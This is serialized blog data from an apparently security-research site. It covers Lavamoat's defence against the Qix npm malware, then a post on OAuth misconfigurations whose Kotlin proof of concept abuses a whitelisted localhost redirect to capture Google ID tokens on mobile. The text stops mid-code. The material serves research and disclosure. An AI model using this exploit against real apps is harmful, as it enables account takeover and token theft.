\"@ethereumjs/util>ethereum-cryptography\"",{"type":24,"tag":301,"props":106037,"children":106038},{"style":359},[106039],{"type":30,"value":5615},{"type":24,"tag":301,"props":106041,"children":106042},{"style":348},[106043],{"type":30,"value":43932},{"type":24,"tag":301,"props":106045,"children":106046},{"class":303,"line":635},[106047],{"type":24,"tag":301,"props":106048,"children":106049},{"style":359},[106050],{"type":30,"value":19459},{"type":24,"tag":301,"props":106052,"children":106053},{"class":303,"line":643},[106054],{"type":24,"tag":301,"props":106055,"children":106056},{"style":359},[106057],{"type":30,"value":501},{"type":24,"tag":301,"props":106059,"children":106060},{"class":303,"line":652},[106061],{"type":24,"tag":301,"props":106062,"children":106063},{"style":359},[106064],{"type":30,"value":698},{"type":24,"tag":32,"props":106066,"children":106067},{},[106068,106070,106076,106078,106084,106085,106090,106092,106098,106099,106105],{"type":30,"value":106069},"In this example, it restricts the ",{"type":24,"tag":145,"props":106071,"children":106073},{"className":106072},[],[106074],{"type":30,"value":106075},"@ethereumjs/util",{"type":30,"value":106077}," package to use only ",{"type":24,"tag":145,"props":106079,"children":106081},{"className":106080},[],[106082],{"type":30,"value":106083},"console.warn",{"type":30,"value":2378},{"type":24,"tag":145,"props":106086,"children":106088},{"className":106087},[],[106089],{"type":30,"value":40843},{"type":30,"value":106091}," functions, and to include only ",{"type":24,"tag":145,"props":106093,"children":106095},{"className":106094},[],[106096],{"type":30,"value":106097},"@ethereumjs/rlp",{"type":30,"value":2378},{"type":24,"tag":145,"props":106100,"children":106102},{"className":106101},[],[106103],{"type":30,"value":106104},"ethereum-cryptography",{"type":30,"value":106106}," packages.",{"type":24,"tag":32,"props":106108,"children":106109},{},[106110],{"type":30,"value":106111},"The policy files can be generated automatically and should be regenerated carefully, because if you generate a policy while a malicious package is installed, Lavamoat’s protection can be bypassed.",{"type":24,"tag":32,"props":106113,"children":106114},{},[106115,106117,106123],{"type":30,"value":106116},"Lavamoat also automatically freezes the global objects to prevent them being replaced or tampered with. See ",{"type":24,"tag":188,"props":106118,"children":106121},{"href":106119,"rel":106120},"https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze",[192],[106122],{"type":30,"value":44117},{"type":30,"value":206},{"type":24,"tag":80,"props":106125,"children":106127},{"id":106126},"lavamoat-vs-qix-malware",[106128],{"type":30,"value":106129},"Lavamoat vs Qix Malware",{"type":24,"tag":32,"props":106131,"children":106132},{},[106133,106135,106140],{"type":30,"value":106134},"If a dApp were compromised with the Qix malware (say it used ",{"type":24,"tag":145,"props":106136,"children":106138},{"className":106137},[],[106139],{"type":30,"value":103980},{"type":30,"value":106141},"), it would need to perform the following actions to drain funds from a wallet:",{"type":24,"tag":6246,"props":106143,"children":106144},{},[106145,106157,106168,106179],{"type":24,"tag":2659,"props":106146,"children":106147},{},[106148,106150,106155],{"type":30,"value":106149},"Replace ",{"type":24,"tag":145,"props":106151,"children":106153},{"className":106152},[],[106154],{"type":30,"value":40843},{"type":30,"value":106156}," function to a custom one",{"type":24,"tag":2659,"props":106158,"children":106159},{},[106160,106162],{"type":30,"value":106161},"Access ",{"type":24,"tag":145,"props":106163,"children":106165},{"className":106164},[],[106166],{"type":30,"value":106167},"window.ethereum",{"type":24,"tag":2659,"props":106169,"children":106170},{},[106171,106173,106178],{"type":30,"value":106172},"Call original ",{"type":24,"tag":145,"props":106174,"children":106176},{"className":106175},[],[106177],{"type":30,"value":40843},{"type":30,"value":44953},{"type":24,"tag":2659,"props":106180,"children":106181},{},[106182],{"type":30,"value":106183},"Plus other actions not relevant here",{"type":24,"tag":32,"props":106185,"children":106186},{},[106187,106189,106195],{"type":30,"value":106188},"If the dApp is using Lavamoat with a generated policy for ",{"type":24,"tag":145,"props":106190,"children":106192},{"className":106191},[],[106193],{"type":30,"value":106194},"chalk 5.6.0",{"type":30,"value":106196}," (non-malicious version) it would look like this:",{"type":24,"tag":291,"props":106198,"children":106200},{"code":106199,"language":6680,"meta":7,"className":6681,"style":7},"\"chalk\": {\n \"globals\": {\n \"navigator.userAgent\": true,\n \"navigator.userAgentData\": true\n }\n },\n",[106201],{"type":24,"tag":145,"props":106202,"children":106203},{"__ignoreMap":7},[106204,106216,106227,106247,106263,106270],{"type":24,"tag":301,"props":106205,"children":106206},{"class":303,"line":304},[106207,106212],{"type":24,"tag":301,"props":106208,"children":106209},{"style":329},[106210],{"type":30,"value":106211},"\"chalk\"",{"type":24,"tag":301,"props":106213,"children":106214},{"style":359},[106215],{"type":30,"value":6726},{"type":24,"tag":301,"props":106217,"children":106218},{"class":303,"line":320},[106219,106223],{"type":24,"tag":301,"props":106220,"children":106221},{"style":369},[106222],{"type":30,"value":43771},{"type":24,"tag":301,"props":106224,"children":106225},{"style":359},[106226],{"type":30,"value":6726},{"type":24,"tag":301,"props":106228,"children":106229},{"class":303,"line":335},[106230,106235,106239,106243],{"type":24,"tag":301,"props":106231,"children":106232},{"style":369},[106233],{"type":30,"value":106234}," \"navigator.userAgent\"",{"type":24,"tag":301,"props":106236,"children":106237},{"style":359},[106238],{"type":30,"value":5615},{"type":24,"tag":301,"props":106240,"children":106241},{"style":348},[106242],{"type":30,"value":10819},{"type":24,"tag":301,"props":106244,"children":106245},{"style":359},[106246],{"type":30,"value":1729},{"type":24,"tag":301,"props":106248,"children":106249},{"class":303,"line":344},[106250,106255,106259],{"type":24,"tag":301,"props":106251,"children":106252},{"style":369},[106253],{"type":30,"value":106254}," \"navigator.userAgentData\"",{"type":24,"tag":301,"props":106256,"children":106257},{"style":359},[106258],{"type":30,"value":5615},{"type":24,"tag":301,"props":106260,"children":106261},{"style":348},[106262],{"type":30,"value":43932},{"type":24,"tag":301,"props":106264,"children":106265},{"class":303,"line":401},[106266],{"type":24,"tag":301,"props":106267,"children":106268},{"style":359},[106269],{"type":30,"value":19459},{"type":24,"tag":301,"props":106271,"children":106272},{"class":303,"line":415},[106273],{"type":24,"tag":301,"props":106274,"children":106275},{"style":359},[106276],{"type":30,"value":32137},{"type":24,"tag":32,"props":106278,"children":106279},{},[106280,106282,106288],{"type":30,"value":106281},"That means that the chalk dependency can only access these two global attributes from ",{"type":24,"tag":145,"props":106283,"children":106285},{"className":106284},[],[106286],{"type":30,"value":106287},"navigator",{"type":30,"value":206},{"type":24,"tag":32,"props":106290,"children":106291},{},[106292,106294,106300],{"type":30,"value":106293},"When the compromised dApp would execute the malicious payload of ",{"type":24,"tag":145,"props":106295,"children":106297},{"className":106296},[],[106298],{"type":30,"value":106299},"chalk v5.6.1",{"type":30,"value":106301}," it would fail due to insufficient permissions:",{"type":24,"tag":32,"props":106303,"children":106304},{},[106305],{"type":24,"tag":177,"props":106306,"children":106308},{"alt":179,"src":106307},"/posts/supply-chain-attcks/error.png",[],{"type":24,"tag":32,"props":106310,"children":106311},{},[106312,106314,106319],{"type":30,"value":106313},"This error shows that the malware failed since it cannot redefine ",{"type":24,"tag":145,"props":106315,"children":106317},{"className":106316},[],[106318],{"type":30,"value":40843},{"type":30,"value":32224},{"type":24,"tag":291,"props":106321,"children":106323},{"code":106322},"TypeError#1: Cannot define property fetch, object is not extensible\n",[106324],{"type":24,"tag":145,"props":106325,"children":106326},{"__ignoreMap":7},[106327],{"type":30,"value":106322},{"type":24,"tag":43,"props":106329,"children":106331},{"id":106330},"lavamoat-in-practice",[106332],{"type":30,"value":106333},"Lavamoat In Practice",{"type":24,"tag":32,"props":106335,"children":106336},{},[106337,106339,106346],{"type":30,"value":106338},"The OtterSec team audited the Lavamoat Webpack Plugin in late 2024 and identified vulnerabilities that attackers could abuse to bypass Lavamoat protections (",{"type":24,"tag":188,"props":106340,"children":106343},{"href":106341,"rel":106342},"https://osec.io/reports/lavamoat_audit_final.pdf",[192],[106344],{"type":30,"value":106345},"see the audit report",{"type":30,"value":27511},{"type":24,"tag":32,"props":106348,"children":106349},{},[106350],{"type":30,"value":106351},"Like any security tool, it isn’t flawless, but it represents an important shift: it minimizes what malicious code can do, rather than assuming every dependency deserves full trust. Supply-chain attacks are designed to hit as many victims as possible, not to target individual organizations. By implementing Lavamoat, you dramatically reduce your exposure and force attackers to look elsewhere.",{"type":24,"tag":43,"props":106353,"children":106354},{"id":82510},[106355],{"type":30,"value":82513},{"type":24,"tag":32,"props":106357,"children":106358},{},[106359],{"type":30,"value":106360},"The NPM incident may not have caused massive losses, but it was a clear proof-of-concept for how fragile the current model is. Supply-chain attacks will happen again, and relying on registry security alone is not enough.",{"type":24,"tag":32,"props":106362,"children":106363},{},[106364,106366,106371],{"type":30,"value":106365},"Version pinning and ",{"type":24,"tag":145,"props":106367,"children":106369},{"className":106368},[],[106370],{"type":30,"value":105807},{"type":30,"value":106372}," provide a baseline defense, but Lavamoat represents the next step: enforcing least privilege for dependencies. If you’re building critical applications, adopting and contributing to Lavamoat is one of the most effective ways to stay ahead.",{"type":24,"tag":9672,"props":106374,"children":106375},{},[106376],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":106378},[106379,106382,106383,106392,106393],{"id":103995,"depth":320,"text":103998,"children":106380},[106381],{"id":105630,"depth":335,"text":105633},{"id":105641,"depth":320,"text":105644},{"id":105657,"depth":320,"text":105660,"children":106384},[106385,106387,106389,106391],{"id":105668,"depth":335,"text":106386},"1. Version pinning in package.json",{"id":105798,"depth":335,"text":106388},"2. Use npm ci",{"id":105835,"depth":335,"text":106390},"3. Implement Lavamoat",{"id":106126,"depth":335,"text":106129},{"id":106330,"depth":320,"text":106333},{"id":82510,"depth":320,"text":82513},"content:blog:2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks.md","blog/2025-09-13-how-to-survive-supply-chain-attacks",{"_path":106398,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":106399,"description":106400,"date":106401,"author":106402,"image":106403,"isFeatured":16,"onBlogPage":16,"tags":106405,"body":106408,"_type":9700,"_id":108739,"_source":9702,"_file":108740,"_stem":108741,"_extension":9705},"/blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations","How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs","OAuth misconfigurations show how common dev settings can lead to account takeovers. Explore real cases where failing to account for differences between desktop and mobile environments left SDKs, exchanges, and wallets vulnerable to exploits.","2025-10-16T12:00:00.000Z",[37957,37956],{"src":106404,"width":14,"height":15},"/posts/oauth-misconfigurations/title.png",[106406,106407],"oAuth","exchanges",{"type":21,"children":106409,"toc":108726},[106410,106416,106421,106427,106447,106453,106458,106471,106476,106484,106498,106507,106516,106530,106538,106549,106609,106615,106627,106676,106682,106687,106700,106707,106718,106738,106757,106778,106784,106797,106802,106808,106827,107452,107457,107470,108331,108336,108341,108347,108352,108358,108363,108376,108416,108422,108435,108440,108473,108478,108483,108508,108513,108525,108682,108687,108691,108703,108708,108712,108717,108722],{"type":24,"tag":43,"props":106411,"children":106413},{"id":106412},"exploiting-oauth",[106414],{"type":30,"value":106415},"Exploiting OAuth",{"type":24,"tag":32,"props":106417,"children":106418},{},[106419],{"type":30,"value":106420},"Our main research focus was related to recent vulnerabilities we found in some of our audits. One common issue we find is related to OAuth misconfigurations that can be exploited to achieve account takeover. To understand the vulnerability and the exploit itself, we first need to dig into the different OAuth flows and the configurations that can be made in the Google Cloud Console.",{"type":24,"tag":80,"props":106422,"children":106424},{"id":106423},"google-authentication-flows",[106425],{"type":30,"value":106426},"Google Authentication Flows",{"type":24,"tag":32,"props":106428,"children":106429},{},[106430,106432,106438,106440,106445],{"type":30,"value":106431},"During our research, we identified various Google Authentication flows that require different exploitation methods. The new/most recent flow is called GSI, which mainly uses ",{"type":24,"tag":145,"props":106433,"children":106435},{"className":106434},[],[106436],{"type":30,"value":106437},"postMessage",{"type":30,"value":106439}," for communication with the Relying Party (RP), and the old one mostly uses ",{"type":24,"tag":145,"props":106441,"children":106443},{"className":106442},[],[106444],{"type":30,"value":76478},{"type":30,"value":106446}," to send the token back to the RP.",{"type":24,"tag":270,"props":106448,"children":106450},{"id":106449},"gsi-new-flow",[106451],{"type":30,"value":106452},"GSI (New Flow)",{"type":24,"tag":32,"props":106454,"children":106455},{},[106456],{"type":30,"value":106457},"The GSI flow also has two ways to authenticate the user to the RP:",{"type":24,"tag":2655,"props":106459,"children":106460},{},[106461,106466],{"type":24,"tag":2659,"props":106462,"children":106463},{},[106464],{"type":30,"value":106465},"Using FedCM API",{"type":24,"tag":2659,"props":106467,"children":106468},{},[106469],{"type":30,"value":106470},"Without using FedCM API",{"type":24,"tag":32,"props":106472,"children":106473},{},[106474],{"type":30,"value":106475},"FedCM (Federated Credentials Manager) is a new browser API that lets users authenticate natively to an RP using a third-party IdP.",{"type":24,"tag":32,"props":106477,"children":106478},{},[106479],{"type":24,"tag":60,"props":106480,"children":106481},{},[106482],{"type":30,"value":106483},"FedCM Method",{"type":24,"tag":32,"props":106485,"children":106486},{},[106487,106489,106496],{"type":30,"value":106488},"The FedCM method basically follows this ",{"type":24,"tag":188,"props":106490,"children":106493},{"href":106491,"rel":106492},"https://privacysandbox.google.com/cookies/fedcm/why#user-interaction",[192],[106494],{"type":30,"value":106495},"user experience",{"type":30,"value":106497},". Users can log in by clicking a login button (which will open a \"choose your account\" prompt window) or by 1-tap UX (see images below).",{"type":24,"tag":32,"props":106499,"children":106500},{},[106501,106503],{"type":30,"value":106502},"The normal flow, clicking the \"sign in\" button:\n",{"type":24,"tag":177,"props":106504,"children":106506},{"alt":179,"src":106505},"/posts/oauth-misconfigurations/image1.png",[],{"type":24,"tag":32,"props":106508,"children":106509},{},[106510,106512],{"type":30,"value":106511},"One-Tap popup shown when you open the page:\n",{"type":24,"tag":177,"props":106513,"children":106515},{"alt":179,"src":106514},"/posts/oauth-misconfigurations/image2.png",[],{"type":24,"tag":32,"props":106517,"children":106518},{},[106519,106521,106528],{"type":30,"value":106520},"Both flows use FedCM API to authenticate using Google IdP service, which makes some CORS requests to the IdP server to return the token. After authenticating the first time, when the user returns to the same website after some time, it is possible to automatically reauthenticate using ",{"type":24,"tag":188,"props":106522,"children":106525},{"href":106523,"rel":106524},"https://github.com/w3c-fedid/FedCM/issues/429",[192],[106526],{"type":30,"value":106527},"FedCM auto-reauthentication",{"type":30,"value":106529},", which has certain preconditions that must be met.",{"type":24,"tag":32,"props":106531,"children":106532},{},[106533],{"type":24,"tag":60,"props":106534,"children":106535},{},[106536],{"type":30,"value":106537},"Non-FedCM Method",{"type":24,"tag":32,"props":106539,"children":106540},{},[106541,106543,106548],{"type":30,"value":106542},"This method uses a popup window (or iframe) to open the Google OAuth consent page and return the token via ",{"type":24,"tag":145,"props":106544,"children":106546},{"className":106545},[],[106547],{"type":30,"value":106437},{"type":30,"value":1679},{"type":24,"tag":6246,"props":106550,"children":106551},{},[106552,106557,106581,106586,106597],{"type":24,"tag":2659,"props":106553,"children":106554},{},[106555],{"type":30,"value":106556},"The user clicks the sign in button",{"type":24,"tag":2659,"props":106558,"children":106559},{},[106560,106562,106568,106570,106575,106576],{"type":30,"value":106561},"RP opens a popup/iframe to ",{"type":24,"tag":188,"props":106563,"children":106566},{"href":106564,"rel":106565},"https://accounts.google.com/o/oauth2/v2/auth",[192],[106567],{"type":30,"value":106564},{"type":30,"value":106569}," with some important parameters like ",{"type":24,"tag":145,"props":106571,"children":106573},{"className":106572},[],[106574],{"type":30,"value":76310},{"type":30,"value":2378},{"type":24,"tag":145,"props":106577,"children":106579},{"className":106578},[],[106580],{"type":30,"value":46871},{"type":24,"tag":2659,"props":106582,"children":106583},{},[106584],{"type":30,"value":106585},"The user clicks the \"Continue\" button to authorize authentication",{"type":24,"tag":2659,"props":106587,"children":106588},{},[106589,106591],{"type":30,"value":106590},"They get redirected to ",{"type":24,"tag":188,"props":106592,"children":106595},{"href":106593,"rel":106594},"https://accounts.google.com/gsi/transform",[192],[106596],{"type":30,"value":106593},{"type":24,"tag":2659,"props":106598,"children":106599},{},[106600,106602,106607],{"type":30,"value":106601},"/gsi/transform sends the token back to the RP via ",{"type":24,"tag":145,"props":106603,"children":106605},{"className":106604},[],[106606],{"type":30,"value":106437},{"type":30,"value":106608}," (after some SYN/ACK messages)",{"type":24,"tag":270,"props":106610,"children":106612},{"id":106611},"oauth-20-old-flow",[106613],{"type":30,"value":106614},"OAuth 2.0 Old Flow",{"type":24,"tag":32,"props":106616,"children":106617},{},[106618,106620,106625],{"type":30,"value":106619},"The old flow also redirects the user to the Google OAuth consent page and then returns the token via a ",{"type":24,"tag":145,"props":106621,"children":106623},{"className":106622},[],[106624],{"type":30,"value":76478},{"type":30,"value":106626}," provided in the URL and validated by a whitelist configuration:",{"type":24,"tag":6246,"props":106628,"children":106629},{},[106630,106634,106655,106659],{"type":24,"tag":2659,"props":106631,"children":106632},{},[106633],{"type":30,"value":106556},{"type":24,"tag":2659,"props":106635,"children":106636},{},[106637,106638,106643,106644,106649,106650],{"type":30,"value":106561},{"type":24,"tag":188,"props":106639,"children":106641},{"href":106564,"rel":106640},[192],[106642],{"type":30,"value":106564},{"type":30,"value":106569},{"type":24,"tag":145,"props":106645,"children":106647},{"className":106646},[],[106648],{"type":30,"value":76310},{"type":30,"value":2378},{"type":24,"tag":145,"props":106651,"children":106653},{"className":106652},[],[106654],{"type":30,"value":76478},{"type":24,"tag":2659,"props":106656,"children":106657},{},[106658],{"type":30,"value":106585},{"type":24,"tag":2659,"props":106660,"children":106661},{},[106662,106663,106668,106670],{"type":30,"value":106590},{"type":24,"tag":145,"props":106664,"children":106666},{"className":106665},[],[106667],{"type":30,"value":76478},{"type":30,"value":106669}," with the token in the query parameters or ",{"type":24,"tag":145,"props":106671,"children":106673},{"className":106672},[],[106674],{"type":30,"value":106675},"location.hash",{"type":24,"tag":270,"props":106677,"children":106679},{"id":106678},"different-configurations",[106680],{"type":30,"value":106681},"Different Configurations",{"type":24,"tag":32,"props":106683,"children":106684},{},[106685],{"type":30,"value":106686},"These two flows must be configured differently in the Google Cloud Console. There are two whitelist configurations that we can control:",{"type":24,"tag":2655,"props":106688,"children":106689},{},[106690,106695],{"type":24,"tag":2659,"props":106691,"children":106692},{},[106693],{"type":30,"value":106694},"Authorized origins",{"type":24,"tag":2659,"props":106696,"children":106697},{},[106698],{"type":30,"value":106699},"Authorized redirect URIs",{"type":24,"tag":32,"props":106701,"children":106702},{},[106703],{"type":24,"tag":177,"props":106704,"children":106706},{"alt":179,"src":106705},"/posts/oauth-misconfigurations/image3.png",[],{"type":24,"tag":32,"props":106708,"children":106709},{},[106710,106712,106717],{"type":30,"value":106711},"The described GSI flow doesn't use any redirection to send the token back to the RP, so the authorized redirect URI is not that important in the GSI flow. It uses the authorized origins to verify if the RP page is actually allowed to be authenticated using that ",{"type":24,"tag":145,"props":106713,"children":106715},{"className":106714},[],[106716],{"type":30,"value":76310},{"type":30,"value":206},{"type":24,"tag":32,"props":106719,"children":106720},{},[106721,106723,106729,106731,106736],{"type":30,"value":106722},"The actual verification in the GSI flow happens in the CORS requests made by FedCM or in ",{"type":24,"tag":145,"props":106724,"children":106726},{"className":106725},[],[106727],{"type":30,"value":106728},"/oauth2/v2/auth",{"type":30,"value":106730}," by checking the ",{"type":24,"tag":145,"props":106732,"children":106734},{"className":106733},[],[106735],{"type":30,"value":46871},{"type":30,"value":106737}," query parameter.",{"type":24,"tag":32,"props":106739,"children":106740},{},[106741,106743,106748,106750,106755],{"type":30,"value":106742},"In the old flow, the ",{"type":24,"tag":145,"props":106744,"children":106746},{"className":106745},[],[106747],{"type":30,"value":76478},{"type":30,"value":106749}," parameter passed in the ",{"type":24,"tag":145,"props":106751,"children":106753},{"className":106752},[],[106754],{"type":30,"value":106728},{"type":30,"value":106756}," endpoint is validated against the authorized redirect URIs.",{"type":24,"tag":32,"props":106758,"children":106759},{},[106760,106762,106767,106769,106776],{"type":30,"value":106761},"Note that the new GSI flow can also have a different flow using ",{"type":24,"tag":145,"props":106763,"children":106765},{"className":106764},[],[106766],{"type":30,"value":76478},{"type":30,"value":106768}," validation. To execute this flow, you need to specify ",{"type":24,"tag":188,"props":106770,"children":106773},{"href":106771,"rel":106772},"https://developers.google.com/identity/gsi/web/reference/js-reference#login_uri",[192],[106774],{"type":30,"value":106775},"login_uri",{"type":30,"value":106777}," while using the SDK.",{"type":24,"tag":80,"props":106779,"children":106781},{"id":106780},"localhost-exploit",[106782],{"type":30,"value":106783},"Localhost Exploit",{"type":24,"tag":32,"props":106785,"children":106786},{},[106787,106789,106795],{"type":30,"value":106788},"During one of our audits, we found a bug related to how developers test the OAuth flow in their development environment. Developers often whitelist the ",{"type":24,"tag":145,"props":106790,"children":106792},{"className":106791},[],[106793],{"type":30,"value":106794},"localhost",{"type":30,"value":106796}," origin because it is considered trusted for local testing.",{"type":24,"tag":32,"props":106798,"children":106799},{},[106800],{"type":30,"value":106801},"Actually, this is partially true, as it depends on which security assumptions you make. This can be an issue in a mobile environment, as mobile apps can open localhost webservers without many permissions, and having a malicious app installed is not considered a significant issue on mobile since all applications are sandboxed. This configuration allows a malicious application to \"escape\" the sandbox and attack another system.",{"type":24,"tag":270,"props":106803,"children":106805},{"id":106804},"exploit",[106806],{"type":30,"value":106807},"Exploit",{"type":24,"tag":32,"props":106809,"children":106810},{},[106811,106813,106818,106819,106825],{"type":30,"value":106812},"To exploit this misconfiguration, we first needed to understand the OAuth flow used by the target. If the OAuth implementation follows a standard flow without using Google Sign-In (GSI), we can extract the token via ",{"type":24,"tag":145,"props":106814,"children":106816},{"className":106815},[],[106817],{"type":30,"value":106675},{"type":30,"value":152},{"type":24,"tag":145,"props":106820,"children":106822},{"className":106821},[],[106823],{"type":30,"value":106824},"location.search",{"type":30,"value":106826},". To achieve this, we developed a Kotlin application that spins up a local web server:",{"type":24,"tag":291,"props":106828,"children":106832},{"className":106829,"code":106830,"language":106831,"meta":7,"style":7},"language-kt shiki shiki-themes slack-dark"," override fun onCreate(savedInstanceState: Bundle?){\n super.onCreate(savedInstanceState)\n\n // Start the Ktor web server\n CoroutineScope(Dispatchers.IO).launch {\n try {\n startWebServer()\n Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n } catch (e: Exception) {\n Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n }\n }\n\n // Open the Google OAuth page\n val googleOAuthUrl = \"https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=redacted&redirect_uri=http://localhost:3000/auth/index.html&response_type=id_token&scope=email&nonce=redacted&prompt=select_account&service=lso&o2v=2&flowName=GeneralOAuthFlow\"\n val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(googleOAuthUrl))\n startActivity(browserIntent)\n }\n\n private fun startWebServer() {\n embeddedServer(CIO, port = 3000) {\n routing {\n get(\"{...}\") {\n call.respondHtml {\n head {\n meta(charset = \"UTF-8\")\n meta(name = \"viewport\", content = \"width=device-width, initial-scale=1.0\")\n title(\"OAuth Redirect\")\n }\n body {\n h1 { +\"Google OAuth Redirect\" }\n script {\n +\"document.body.innerText = location.hash;\"\n }\n }\n }\n }\n }\n }.start(wait = true)\n }\n","kt",[106833],{"type":24,"tag":145,"props":106834,"children":106835},{"__ignoreMap":7},[106836,106865,106884,106891,106898,106917,106928,106939,106970,106993,107040,107047,107054,107061,107068,107088,107119,107130,107137,107144,107163,107186,107197,107216,107231,107242,107265,107300,107319,107326,107337,107360,107371,107383,107390,107397,107404,107411,107418,107445],{"type":24,"tag":301,"props":106837,"children":106838},{"class":303,"line":304},[106839,106844,106848,106852,106856,106860],{"type":24,"tag":301,"props":106840,"children":106841},{"style":348},[106842],{"type":30,"value":106843}," override",{"type":24,"tag":301,"props":106845,"children":106846},{"style":348},[106847],{"type":30,"value":13026},{"type":24,"tag":301,"props":106849,"children":106850},{"style":314},[106851],{"type":30,"value":77166},{"type":24,"tag":301,"props":106853,"children":106854},{"style":359},[106855],{"type":30,"value":77171},{"type":24,"tag":301,"props":106857,"children":106858},{"style":10246},[106859],{"type":30,"value":77176},{"type":24,"tag":301,"props":106861,"children":106862},{"style":359},[106863],{"type":30,"value":106864},"?){\n",{"type":24,"tag":301,"props":106866,"children":106867},{"class":303,"line":320},[106868,106872,106876,106880],{"type":24,"tag":301,"props":106869,"children":106870},{"style":348},[106871],{"type":30,"value":77189},{"type":24,"tag":301,"props":106873,"children":106874},{"style":359},[106875],{"type":30,"value":206},{"type":24,"tag":301,"props":106877,"children":106878},{"style":314},[106879],{"type":30,"value":77198},{"type":24,"tag":301,"props":106881,"children":106882},{"style":359},[106883],{"type":30,"value":77203},{"type":24,"tag":301,"props":106885,"children":106886},{"class":303,"line":335},[106887],{"type":24,"tag":301,"props":106888,"children":106889},{"emptyLinePlaceholder":16},[106890],{"type":30,"value":341},{"type":24,"tag":301,"props":106892,"children":106893},{"class":303,"line":344},[106894],{"type":24,"tag":301,"props":106895,"children":106896},{"style":1062},[106897],{"type":30,"value":77218},{"type":24,"tag":301,"props":106899,"children":106900},{"class":303,"line":401},[106901,106905,106909,106913],{"type":24,"tag":301,"props":106902,"children":106903},{"style":314},[106904],{"type":30,"value":77226},{"type":24,"tag":301,"props":106906,"children":106907},{"style":359},[106908],{"type":30,"value":77231},{"type":24,"tag":301,"props":106910,"children":106911},{"style":314},[106912],{"type":30,"value":77236},{"type":24,"tag":301,"props":106914,"children":106915},{"style":359},[106916],{"type":30,"value":3035},{"type":24,"tag":301,"props":106918,"children":106919},{"class":303,"line":415},[106920,106924],{"type":24,"tag":301,"props":106921,"children":106922},{"style":308},[106923],{"type":30,"value":77248},{"type":24,"tag":301,"props":106925,"children":106926},{"style":359},[106927],{"type":30,"value":3035},{"type":24,"tag":301,"props":106929,"children":106930},{"class":303,"line":439},[106931,106935],{"type":24,"tag":301,"props":106932,"children":106933},{"style":314},[106934],{"type":30,"value":77260},{"type":24,"tag":301,"props":106936,"children":106937},{"style":359},[106938],{"type":30,"value":14551},{"type":24,"tag":301,"props":106940,"children":106941},{"class":303,"line":447},[106942,106946,106950,106954,106958,106962,106966],{"type":24,"tag":301,"props":106943,"children":106944},{"style":359},[106945],{"type":30,"value":77272},{"type":24,"tag":301,"props":106947,"children":106948},{"style":314},[106949],{"type":30,"value":77277},{"type":24,"tag":301,"props":106951,"children":106952},{"style":359},[106953],{"type":30,"value":362},{"type":24,"tag":301,"props":106955,"children":106956},{"style":329},[106957],{"type":30,"value":77286},{"type":24,"tag":301,"props":106959,"children":106960},{"style":359},[106961],{"type":30,"value":377},{"type":24,"tag":301,"props":106963,"children":106964},{"style":329},[106965],{"type":30,"value":77295},{"type":24,"tag":301,"props":106967,"children":106968},{"style":359},[106969],{"type":30,"value":791},{"type":24,"tag":301,"props":106971,"children":106972},{"class":303,"line":476},[106973,106977,106981,106985,106989],{"type":24,"tag":301,"props":106974,"children":106975},{"style":359},[106976],{"type":30,"value":77307},{"type":24,"tag":301,"props":106978,"children":106979},{"style":348},[106980],{"type":30,"value":55146},{"type":24,"tag":301,"props":106982,"children":106983},{"style":359},[106984],{"type":30,"value":77316},{"type":24,"tag":301,"props":106986,"children":106987},{"style":10246},[106988],{"type":30,"value":77321},{"type":24,"tag":301,"props":106990,"children":106991},{"style":359},[106992],{"type":30,"value":398},{"type":24,"tag":301,"props":106994,"children":106995},{"class":303,"line":495},[106996,107000,107004,107008,107012,107016,107020,107024,107028,107032,107036],{"type":24,"tag":301,"props":106997,"children":106998},{"style":359},[106999],{"type":30,"value":77272},{"type":24,"tag":301,"props":107001,"children":107002},{"style":314},[107003],{"type":30,"value":58179},{"type":24,"tag":301,"props":107005,"children":107006},{"style":359},[107007],{"type":30,"value":362},{"type":24,"tag":301,"props":107009,"children":107010},{"style":329},[107011],{"type":30,"value":77286},{"type":24,"tag":301,"props":107013,"children":107014},{"style":359},[107015],{"type":30,"value":377},{"type":24,"tag":301,"props":107017,"children":107018},{"style":329},[107019],{"type":30,"value":77353},{"type":24,"tag":301,"props":107021,"children":107022},{"style":348},[107023],{"type":30,"value":40857},{"type":24,"tag":301,"props":107025,"children":107026},{"style":385},[107027],{"type":30,"value":77362},{"type":24,"tag":301,"props":107029,"children":107030},{"style":348},[107031],{"type":30,"value":40889},{"type":24,"tag":301,"props":107033,"children":107034},{"style":329},[107035],{"type":30,"value":9408},{"type":24,"tag":301,"props":107037,"children":107038},{"style":359},[107039],{"type":30,"value":77375},{"type":24,"tag":301,"props":107041,"children":107042},{"class":303,"line":504},[107043],{"type":24,"tag":301,"props":107044,"children":107045},{"style":359},[107046],{"type":30,"value":65600},{"type":24,"tag":301,"props":107048,"children":107049},{"class":303,"line":512},[107050],{"type":24,"tag":301,"props":107051,"children":107052},{"style":359},[107053],{"type":30,"value":3345},{"type":24,"tag":301,"props":107055,"children":107056},{"class":303,"line":592},[107057],{"type":24,"tag":301,"props":107058,"children":107059},{"emptyLinePlaceholder":16},[107060],{"type":30,"value":341},{"type":24,"tag":301,"props":107062,"children":107063},{"class":303,"line":619},[107064],{"type":24,"tag":301,"props":107065,"children":107066},{"style":1062},[107067],{"type":30,"value":77404},{"type":24,"tag":301,"props":107069,"children":107070},{"class":303,"line":635},[107071,107075,107079,107083],{"type":24,"tag":301,"props":107072,"children":107073},{"style":348},[107074],{"type":30,"value":77412},{"type":24,"tag":301,"props":107076,"children":107077},{"style":359},[107078],{"type":30,"value":77417},{"type":24,"tag":301,"props":107080,"children":107081},{"style":385},[107082],{"type":30,"value":523},{"type":24,"tag":301,"props":107084,"children":107085},{"style":329},[107086],{"type":30,"value":107087}," 